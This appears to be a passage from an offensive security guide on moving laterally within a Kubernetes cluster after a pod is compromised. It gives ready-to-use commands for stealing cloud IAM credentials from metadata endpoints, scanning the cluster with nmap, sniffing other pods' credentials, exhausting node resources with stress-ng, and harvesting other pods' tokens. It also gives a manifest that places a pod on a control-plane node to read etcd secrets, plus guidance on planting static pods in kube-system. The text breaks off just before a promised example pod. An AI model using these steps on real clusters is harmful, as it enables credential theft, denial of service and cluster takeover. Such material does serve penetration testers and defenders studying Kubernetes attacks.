Usually, pods run with a **service account token** mounted inside them. This service account may have some **privileges attached to it** that you could **abuse** to **move laterally** to other pods or even to **escape** to the nodes configured inside the cluster. Check how in:
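For a quick check of what the mounted token is allowed to do, here is a minimal sketch (assuming `kubectl` is available in the pod; otherwise the same checks can be done with `curl` against the API server):

```bash
# Default mount path of the service account credentials
SA=/var/run/secrets/kubernetes.io/serviceaccount
# List every action this token is allowed to perform in its namespace
kubectl --server=https://kubernetes.default.svc \
  --certificate-authority=$SA/ca.crt \
  --token="$(cat $SA/token)" \
  auth can-i --list
```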
If the pod is run inside a **cloud environment** you might be able to **leak a token from the metadata endpoint** and escalate privileges using it.
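For example, on GKE the instance metadata endpoint can return a token for the node's cloud service account (a sketch; other clouds use different paths and headers):

```bash
# GCP/GKE: the Metadata-Flavor header is required
curl -s -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"
```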
## Search vulnerable network services
As you are inside the Kubernetes environment, if you cannot escalate privileges abusing the current pod's privileges and you cannot escape from the container, you should **search for potentially vulnerable services.**
### Services
**For this purpose, you can try to get all the services of the Kubernetes environment:**
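A minimal sketch (assuming the compromised service account is allowed to list services):

```bash
# List every service in every namespace the token can see
kubectl get svc --all-namespaces -o wide
```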
By default, Kubernetes uses a flat networking schema, which means **any pod/service within the cluster can talk to any other**. The **namespaces** within the cluster **don't have any network security restrictions by default**, so anyone in one namespace can talk to other namespaces.
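For example, cross-namespace access works out of the box through cluster DNS (`<service>.<namespace>.svc.cluster.local`); the service and namespace below are just illustrative names:

```bash
# Reach a service living in another namespace directly from the compromised pod
curl -s http://grafana.monitoring.svc.cluster.local:3000
```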
The following Bash script (taken from a [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s_cheatsheet.md)) will install nmap and scan the IP ranges of the Kubernetes cluster:
```bash
sudo apt-get update
sudo apt-get install nmap
nmap-kube ()
{
nmap --open -T4 -A -v -Pn -p 80,443,2379,8080,9090,9100,9093,4001,6782-6784,6443,8443,9099,10250,10255,10256 "${@}"
}
nmap-kube-discover () {
    local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,');
    local SERVER_RANGES=" ";
    # Common internal ranges used by the workshop; adjust to the cluster's CIDRs
    SERVER_RANGES+="10.0.0.1 ";
    SERVER_RANGES+="10.0.1.* ";
    SERVER_RANGES+="10.*.0-1.* ";
    nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
}
nmap-kube-discover
```
In case the **compromised pod is running some sensitive service** where other pods need to authenticate, you might be able to obtain the credentials sent by the other pods.
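A minimal sniffing sketch, assuming `tcpdump` is present (or can be installed) in the pod and that the sensitive service listens on port 8080 (illustrative port):

```bash
# Print authentication traffic reaching the pod in ASCII
tcpdump -i eth0 -A -s 0 'tcp port 8080'
# Or write a capture to disk for offline analysis
tcpdump -i eth0 -s 0 -w /tmp/auth-traffic.pcap 'tcp port 8080'
```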
If no resources are specified in the Kubernetes manifests and **no limit ranges are applied** to the containers, as attackers we can **consume all the resources of the node where the pod/deployment is running**, starve other resources and cause a DoS in the environment.
This can be done with a tool such as [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng):
```
stress-ng --vm 2 --vm-bytes 2G --timeout 30s
```
You can see the difference in resource consumption while `stress-ng` is running and after it finishes:
```bash
kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxxx
```
The script [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) will automatically **get the tokens of other pods and check if they have the permission** you are looking for (instead of you checking them one by one):
```bash
./can-they.sh -i "--list -n default"
./can-they.sh -i "list secrets -n kube-system"// Some code
```
### Pivot to Cloud
If the cluster is managed by a cloud service, usually the **Node will have different access to the metadata endpoint** than the Pod. Therefore, try to **access the metadata endpoint from the node** (or from a pod with `hostNetwork` set to `true`):
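For instance, on AWS/EKS (a sketch; other clouds expose different endpoints, and IMDSv2 additionally requires a session token) the node's IAM credentials can be dumped like this:

```bash
# List the node's IAM role and fetch its temporary credentials (IMDSv1 style)
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
```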
If you can specify the [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node) of the Node that will run the container, get a shell inside a control-plane node and get the **etcd database**:
```
kubectl get nodes
NAME                STATUS   ROLES    AGE   VERSION
k8s-control-plane   Ready    master   93d   v1.19.1
k8s-worker          Ready    <none>   93d   v1.19.1
```
Control-plane nodes have the **role master**, and in **cloud-managed clusters you won't be able to run anything on them**.
#### Read secrets from etcd
If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets.
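A minimal sketch of such a pod (pod name and image are illustrative), scheduled onto the control-plane node seen above and mounting the default `kubeadm` etcd data directory:

```bash
cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: etcd-peek                   # illustrative name
spec:
  nodeName: k8s-control-plane       # node name taken from `kubectl get nodes`
  containers:
  - name: shell
    image: alpine                   # illustrative image
    command: ["sleep", "3600"]
    volumeMounts:
    - name: etcd-data
      mountPath: /host/etcd
      readOnly: true
  volumes:
  - name: etcd-data
    hostPath:
      path: /var/lib/etcd           # default etcd data dir on kubeadm clusters
EOF
```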
Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion.
**Check to see if `etcd` is running on the control-plane node and see where the database is (this is on a cluster created with `kubeadm`):**
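A quick way to do that (a sketch; the exact flags depend on how etcd was started):

```bash
# Find the etcd process and extract its data directory flag
ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir
```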
If you are inside the node host you can make it create a **static pod inside itself**. This is pretty useful because it might allow you to **create a pod in a different namespace** like **kube-system**. This basically means that if you get to the node you could be able to **compromise the whole cluster**. However, note that according to the documentation: _The spec of a static Pod cannot refer to other API objects (e.g., ServiceAccount, ConfigMap, Secret, etc)_.
In order to create a static pod you may just need to **save the yaml configuration of the pod in `/etc/kubernetes/manifests`**. The **kubelet service** will automatically talk to the API server to **create the pod**. The API server will therefore be able to see that the pod is running, but it cannot manage it. The pod names will be suffixed with the node hostname with a leading hyphen.
The **path to the folder** where you should write the pods is given by the **`--pod-manifest-path` parameter of the kubelet process**. If it isn't set, you might need to set it and restart the kubelet to abuse this technique.
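A quick sketch to locate (or confirm) the static pod manifest directory on the node:

```bash
# Check whether the kubelet was started with --pod-manifest-path
ps aux | grep kubelet | tr ' ' '\n' | grep -- --pod-manifest-path
# Newer setups define it as staticPodPath in the kubelet config file instead
grep staticPodPath /var/lib/kubelet/config.yaml 2>/dev/null
```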
**Example** of a **pod** configuration to create a privileged pod in **kube-system**, taken from [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/):